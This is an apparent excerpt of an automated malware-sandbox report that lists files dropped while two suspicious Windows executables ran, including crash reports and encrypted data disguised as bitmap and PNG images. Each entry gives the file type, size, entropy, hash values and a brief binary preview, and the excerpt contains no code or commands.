                                                                                                                                                    SHA-256:978A012E306E017FA850CE80986E4EA3BD8D7749B4C5598A4D282EC390D99609
                                                                                                                                                    SHA-512:462BDA72C0C0C0B9A8AD6ABF8D77C5421E5832CA076F5D29BF06C307C811CB39ABDDEFC20888A9F08FA22271E3E90CC3A90D4BE2756555F04530238296BD8C98
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:RC..... .......A.......X\...;...{......................0.!..........{A......}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...........................................}....................R.....}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16384
                                                                                                                                                    Entropy (8bit):0.07708477168125771
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:4lllEYeAnsY70kjn13a/kIM//lollcVO/lnlZMxZNQl:46z4sm53qkIM/GOewk
                                                                                                                                                    MD5:5B3F4830D396C7ECC8D57CFDFAA1C81C
                                                                                                                                                    SHA1:71C0CA6115B2434AEADDBD729E93E52C987D8F40
                                                                                                                                                    SHA-256:DE9C87A210C2F9393566968012017A3A2ACF32CC890D7847E35F770ED1D13604
                                                                                                                                                    SHA-512:C67EE576069FD36F12C6996AEBEF6213E10F9CCCCD86824AE81D0727D792D2FBEB75A221582D6E99280D033D5426EFBE5C82B1725E762F443D929177D0D32C38
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:..[P.....................................;...{.......}.......{A..............{A......{A..........{A]..................R.....}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):65536
                                                                                                                                                    Entropy (8bit):1.1038116412050012
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:TWSdpAhVI/0I3DUjS/EerIzuiFAZ24lO8X:qSduhVIsI3DUjwIzuiFAY4lO8X
                                                                                                                                                    MD5:C234555860F3DE652979ADAC564001DE
                                                                                                                                                    SHA1:6DF101AB0714DC94EEE9F99DDEF44C8393AFAB89
                                                                                                                                                    SHA-256:E08D0848E64561E7D108EA9634757C76A9768DA2B5113A5F4084D2B5B29B7A43
                                                                                                                                                    SHA-512:E4BE0430EC8C96CFDAFA8FEF60169F8AE6CD98EBD37627B50C2C5DBAE5FC6922611334DB61E2599B21230720652290702650A6A824D1DCAA189FB81B8DB3F2CA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.5.7.2.4.9.7.6.3.8.2.2.9.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.5.7.2.4.9.8.1.3.8.2.2.4.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.1.b.6.2.5.e.-.1.6.8.9.-.4.9.c.5.-.9.b.4.3.-.4.7.8.6.5.5.0.d.d.c.5.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.c.2.c.4.3.1.9.-.2.1.5.7.-.4.e.7.f.-.9.f.3.2.-.5.2.5.9.5.1.9.a.4.7.4.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.J.8.d.a.a.U...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.a.n.a.g.e.R.e.a.d.e.r.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.3.8.-.0.0.0.1.-.0.0.1.8.-.d.1.f.d.-.0.f.d.3.2.a.9.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.8.0.0.d.0.e.1.d.1.0.a.9.8.3.0.4.d.e.b.9.6.0.b.9.b.8.3.2.b.3.6.0.0.0.0.0.9.0.4.!.0.0.0.0.4.4.f.2.1.9.e.c.f.f.f.2.7.b.f.8.1.d.c.c.e.e.0.7.6.5.8.3.d.3.2.c.e.5.b.f.8.2.b.d.!.J.8.d.a.a.U...e.x.
                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Sun Mar 16 04:21:37 2025, 0x1205a4 type
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):293520
                                                                                                                                                    Entropy (8bit):1.1881204411258488
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:pVaPab6860umxrNzyUkFgeZvxthEPLlByRR2ttuAdj:pVaiGE3RzyZFgeF1ETny3SuAdj
                                                                                                                                                    MD5:ED9AFA826F696FC98D10B1029596A10F
                                                                                                                                                    SHA1:19B2F50BF75D0B194CACFEE0A9A50F9ED81C3DAA
                                                                                                                                                    SHA-256:EB26ACC35CD1A55FE7C8D0A342023293569007480626695C585794E9DB6A6F86
                                                                                                                                                    SHA-512:5594717997B964AA01591E8629FD2955DAE1D3735722C530DAFE9E55AA20374D8E6EF08D0A2776747FE604BF027CB359E88DD0F095C1BBA5A7445FBD18D25539
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:MDMP..a..... ........Q.g....................................................T.......8...........T............V...$...........'...........)..............................................................................eJ......X*......Lw......................T.......8....Q.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):6784
                                                                                                                                                    Entropy (8bit):3.7352677845755733
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:RSIU6o7wVetbPZtt4iuxYC3K2JrL85aMQUwx89bIhubDlv7fPM6Ym:R6l7wVeJPZtWVYCDmpDy89bIqJ7fP3Ym
                                                                                                                                                    MD5:4C3611CC42265433CBA2F22A9604D272
                                                                                                                                                    SHA1:917E5C3D349EE5DE5A343AB5D38167CA03949C77
                                                                                                                                                    SHA-256:3CCB7AF10A7BADB25CA791D5BAB838306E747DDCBAB6A2AFA675A981F6EDCB90
                                                                                                                                                    SHA-512:CD8A8653D891220A4BB0C09E13E83A9141748C6D5345FD20A77164D374F4D47E6645CA56D49ADFC03C9D81B97C3EE4A06EE0EC9FA6058604CD4C9E6C340FF37A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.9.2.<./.P.i.
                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4741
                                                                                                                                                    Entropy (8bit):4.49270667683529
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:cvIwWl8zseNJg771I9TwWpW8VYzYm8M4JRXVvOKFsyq85EXECO/VaTJd:uIjfenI7QJ7VfJFBw/jEVaTJd
                                                                                                                                                    MD5:B0431556EC7568778BECA34941CBECE2
                                                                                                                                                    SHA1:94C7A6103A4ADCA8D6A36DD83FA22AE670A10025
                                                                                                                                                    SHA-256:49B618E69414C374845BDB919DD2C235D6473120170486745C916FC56E8F6E74
                                                                                                                                                    SHA-512:08433330CAAB4B9108CFD1E2D674EBE67366606A2E13EB077FD3F5D230869FC06DEAB2798347A2B59B7A8F2944FDA9F3508F851901CFC5C9B53295DCCD968A2D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="762924" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):77814
                                                                                                                                                    Entropy (8bit):3.056199347215454
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:7BYnYGJ4A67t7qPRqZK8uQ/6W7TyVoYZES32:7BYnYGJ4A67t7qPRqZK8uQ/6W7+VoYZ0
                                                                                                                                                    MD5:D6489BAB25F361E05261564BAAD1BC95
                                                                                                                                                    SHA1:EF99894ECFD30E66CB4E67C4B38A4BF319FD6390
                                                                                                                                                    SHA-256:CFB389D05A80E61B0DE429746F76F41E73AD250655953EBD142A29E692475DFB
                                                                                                                                                    SHA-512:FB77946A9AFDD506C57EA5273444F6EEFD9C56D668DA676320FB85A538A94870C76BC422125B37D411F9994DFAF2127123598F65ACAC3D0827878BC6D2014D0D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13340
                                                                                                                                                    Entropy (8bit):2.685368221870173
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:TiZYWFQ3or69Y0MY/WBH2YEZX4tk0iaVDRZzwd9kEasi/m+MsaWIfZ3:2ZDjeKoeEVasie+MsaRfZ3
                                                                                                                                                    MD5:2F7F9CAB24ABC985AFD0BAB8065FAA0B
                                                                                                                                                    SHA1:0A865785E6A9372FC445C9F1FF2651E5BC5929D8
                                                                                                                                                    SHA-256:94D00D345DDDD5B0114A583C3061731898A452CD2B38E368187FDB416AEC0201
                                                                                                                                                    SHA-512:AE09F14D8981C464FF07A9CFC14E0804E1CB53DA91BC6447BD23EA68497DE0F12B9FAFB9EBA3BC1DC800F2B64A35AA80DE59ACAB5E90311A70919146E9733A17
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                    Process:C:\Users\user\Documents\J8daaU.exe
                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1
                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:n:n
                                                                                                                                                    MD5:9E688C58A5487B8EAF69C9E1005AD0BF
                                                                                                                                                    SHA1:C4EA21BB365BBEEAF5F2C654883E56D11E43C44E
                                                                                                                                                    SHA-256:DBC1B4C900FFE48D575B5DA5C638040125F65DB0FE3E24494B76EA986457D986
                                                                                                                                                    SHA-512:FAB848C9B657A853EE37C09CBFDD149D0B3807B191DDE9B623CCD95281DD18705B48C89B1503903845BBA5753945351FE6B454852760F73529CF01CA8F69DCCA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.
                                                                                                                                                    Process:C:\Users\user\Documents\J8daaU.exe
                                                                                                                                                    File Type:PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4799965
                                                                                                                                                    Entropy (8bit):7.999939467238583
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:98304:rOYM9cYUR5XCvgGTIGi3gPQrr0UNQ/uLFOxqU5G0t7mr:rOEDR4TIiPYVp/+qr
                                                                                                                                                    MD5:780F7E533FBA4E98715FEC76E9BA5382
                                                                                                                                                    SHA1:6E7D32DA508D42053EAD852B3A8061C157F70305
                                                                                                                                                    SHA-256:5482623356916214C0168725944A0CD0FF07796FAC00E4D003680E612B879D5C
                                                                                                                                                    SHA-512:E03E0F830E329ABEB1B2734516952E5F6918BEFFF522C6F48B5B578C3597CC6B2475FB86C2A5C78CC7B5776B58DE54C98FC2126F980CA3DD7832A03E40FFAE51
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1
                                                                                                                                                    Process:C:\Users\user\Desktop\Gokod.763652.06.exe
                                                                                                                                                    File Type:PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3679381
                                                                                                                                                    Entropy (8bit):7.999920715139405
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:98304:GZEx+gamAtC3BbCzY01owoUHdGk1LYLROXENnn0b7Ke:/ahwCX1omdw8UNn0XKe
                                                                                                                                                    MD5:13E05500C7D6372C50091A56CB1EB698
                                                                                                                                                    SHA1:6A666C3E374F40CEFF6D18D3B798B4E44116E5FB
                                                                                                                                                    SHA-256:3C6D987704BE11CE13F2EA7D56F9C3A6247C4F2718FD6DCD3389803A4B175845
                                                                                                                                                    SHA-512:4F91ED5CAA1E52105CFC60DC3BA017591A63EAA90AEA3E353404FF9A59A553DD5362F81EF90F81274602F030C0201118C8C13DB685AC91C0AF9EE1397BC95AF1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1
                                                                                                                                                    Process:C:\Users\user\Desktop\Gokod.763652.06.exe
                                                                                                                                                    File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):102636
                                                                                                                                                    Entropy (8bit):7.997951293018451
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:3072:jTDFMOAPqf3lWtmoyUM4J7ruwxW9/o1w5TWdFJUO/Uai:fDC5AVWMo24dT09/O2uCObi
                                                                                                                                                    MD5:CEE07CC9376774EB4A5F09A96A71AD17
                                                                                                                                                    SHA1:881FD345F334BC2E62DF3BDFF647696A55DECEA8
                                                                                                                                                    SHA-256:33C0E19B8FB335397D618A0372CCA727FC8A1FFCD9B2327510C92CCBD5A1C698
                                                                                                                                                    SHA-512:FE03779374AE0C3A4D32B101184B864F1AF68E0ED0523E8B5DA2D3AAC52737BF9F6E0A40BAE36AA8F7423F651CB3297ABA744D3C912641070B315E971DDDB44F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx..}.UU..... ...."..*!.......!YFD.HHhD.F.DD&"......".....0...>..0.0..s...~g..;..s....0...;.....#.rg..Zg.....O...|B..=.. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. .........w....WA..5.G.>+0...._;]9....TN...j.;.5.m)..x....Qw.:..."....@j.....s..Y1ujZ..v.n..H.uKv..1...e.x,..FoK...-wl.....3!.h....3..T.....".....`s...k...T..'...|bnL.Y.V9x{..{f.......e.m...>..%.....@LQ. <e.._..X_Z......7.....s..=R....#..(....n...+|U....mv...3[..7...Tj...y...1......p...Fl..$....cg..am....+{)...'{...t..d...I.h..w.c:..1._?P.R^..n....M>\<....T......e.......n.S..i.<.t........x..-.......9..n..$.....V<.9y.8W$a|6>g...x....A7..6...~x_.Z..\.L...]......9...n..."...o...'.0...`5...+X...;.....&*A.....^d.`.t..`tR.j..D9..9..:.|..X........C(. ..sA...V.._3....q>[.~~p.{.........\..:b....n...i..g....'....A7.JP.#y...v..../..n...=U1.........../..n..@....:..3I.F&t...t.......AG.... ..^..y.
                                                                                                                                                    Process:C:\Users\user\Documents\J8daaU.exe
                                                                                                                                                    File Type:PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):151485
                                                                                                                                                    Entropy (8bit):7.993623090708041
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:3072:AeomT3HgigpWkXL1vWq2p5eMjnun5ebTv0uxgOn2nJCPuWcA3/OhJR:b3X2W81vWBeMjnunIVxgOn2nJ2yr
                                                                                                                                                    MD5:0601876CCE2C3A9A699C096A1B9799E1
                                                                                                                                                    SHA1:C39CD27311668872BC45AA121856F7F373833933
                                                                                                                                                    SHA-256:AE189BAF29687F87ED89507D3901D15020B688683ADABA04625D459363DABC19
                                                                                                                                                    SHA-512:97E803D6CC8E62353B81CDDFC1948246BEE7577169421BBF598B8DC49B538F1341F80A797270A943E7E36C79CED77769688A752E5C9F2195D744509E04BA5874
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1
                                                                                                                                                    Process:C:\Users\user\Desktop\Gokod.763652.06.exe
                                                                                                                                                    File Type:PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3963834
                                                                                                                                                    Entropy (8bit):7.997064399987509
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:49152:POhPyT3tBYfE8C38C4Re7eYDY0vM6so8JSGWOXu/0F5g2ON95swP8gbOOLlBxaH9:FBYbh1odYyws0F5g2308ulXiQKAKPz
                                                                                                                                                    MD5:7389347D4BB06F8A6AC6918F164D86B3
                                                                                                                                                    SHA1:B694D497022098133BCEAD9FB54329570322AD44
                                                                                                                                                    SHA-256:2DD36E91F59CD3335C07DC8380BF70817E6A2C04C1B2ACC32726A74ED92530E0
                                                                                                                                                    SHA-512:3AD8DB1A8F0D62BE0D393F68150C1A8EBFDEA14F0E81FEF6E195669D7B1D6D4AB95403CD9827CA14550235FD8BB2EBA87945BFC7874014FDE220D50D0289EBFB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1
                                                                                                                                                    Process:C:\Users\user\Documents\J8daaU.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):879
                                                                                                                                                    Entropy (8bit):4.688974052882154
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:JRSJwHmHIJRIK4EgY+ZcRC62fmL874S9a6QT7LoV5yEha:fSJGmKIigY+ZcRufmA7VEVEI
                                                                                                                                                    MD5:C345BADB7A3E3F956477B7945E4BE434
                                                                                                                                                    SHA1:CE2EECFF4EAC735F38F82C6FB72A43D1B482839F
                                                                                                                                                    SHA-256:B3CB5CF15F06434BB8F2C2FBDC1B86C8C057721198949928030E380AC6ED75BF
                                                                                                                                                    SHA-512:5729CA585AE10421852D5C91095AA5528AD6DBB2598DAEC7972B86D557DC78D753DC103FB2C3613B9F29DDCED938B9A157CBCD101E0DA63A420B9C63285975CD
                                                                                                                                                    Malicious:false
